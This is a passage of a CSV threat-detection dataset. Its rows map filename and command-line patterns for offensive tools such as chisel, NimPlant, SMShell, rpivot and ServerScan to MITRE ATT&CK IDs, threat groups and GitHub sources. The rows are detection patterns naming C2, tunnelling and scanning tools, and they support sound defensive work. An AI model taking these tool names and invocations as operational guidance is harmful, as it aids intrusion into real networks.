HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","58451" "*server-7566091c4e4a2a24.js*",".{0,1000}server\-7566091c4e4a2a24\.js.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black 
Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","58452" "*server-console.exe +*",".{0,1000}server\-console\.exe\s\+.{0,1000}","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","0","N/A","N/A","10","10","360","35","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z","58453" "*server-console.py --mifi-ip *",".{0,1000}server\-console\.py\s\-\-mifi\-ip\s.{0,1000}","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","0","N/A","N/A","10","10","360","35","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z","58454" "*ServerlessRedirector-main*",".{0,1000}ServerlessRedirector\-main.{0,1000}","offensive_tool_keyword","ServerlessRedirector","Serverless Redirector in various cloud vendor for red team","T1090.003 - T1095 - T1001.003","TA0010 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/KINGSABRI/ServerlessRedirector","1","1","N/A","N/A","10","1","72","10","2022-12-08T08:56:02Z","2022-12-08T07:52:49Z","58456" "*--server-port * --server-ip * --proxy-ip * --proxy-port *",".{0,1000}\-\-server\-port\s.{0,1000}\s\-\-server\-ip\s.{0,1000}\s\-\-proxy\-ip\s.{0,1000}\s\-\-proxy\-port\s.{0,1000}","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","0","N/A","N/A","10","10","589","128","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z","58457" 
"*serverscan.linux.elf*",".{0,1000}serverscan\.linux\.elf.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","#linux","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","58458" "*serverscan.linux.so*",".{0,1000}serverscan\.linux\.so.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - 
T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","#linux","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","58459" "*serverScan.win.cna*",".{0,1000}serverScan\.win\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - 
T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","58460" "*serverscan_386.exe*",".{0,1000}serverscan_386\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - 
T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","58461" "*ServerScan_Air_*.exe*",".{0,1000}ServerScan_Air_.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda 
- AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","58462" "*ServerScan_Air_*_amd64*",".{0,1000}ServerScan_Air_.{0,1000}_amd64.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik 
Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","58463" "*ServerScan_Air_*_i386*",".{0,1000}ServerScan_Air_.{0,1000}_i386.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - 
Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","58464" "*serverscan_air-probes.exe*",".{0,1000}serverscan_air\-probes\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","58465" "*serverscan_amd64.exe*",".{0,1000}serverscan_amd64\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","58466" 
"*ServerScan_Pro_*.exe*",".{0,1000}ServerScan_Pro_.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","58467" "*ServerScan_Pro_*_amd64*",".{0,1000}ServerScan_Pro_.{0,1000}_amd64.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - 
T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","58468" "*ServerScan_Pro_*_i386*",".{0,1000}ServerScan_Pro_.{0,1000}_i386.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - 
T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","58469" "*serverscan64 *",".{0,1000}serverscan64\s.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 
- T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","58470" "*serverscan64 *tcp*",".{0,1000}serverscan64\s.{0,1000}tcp.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic 
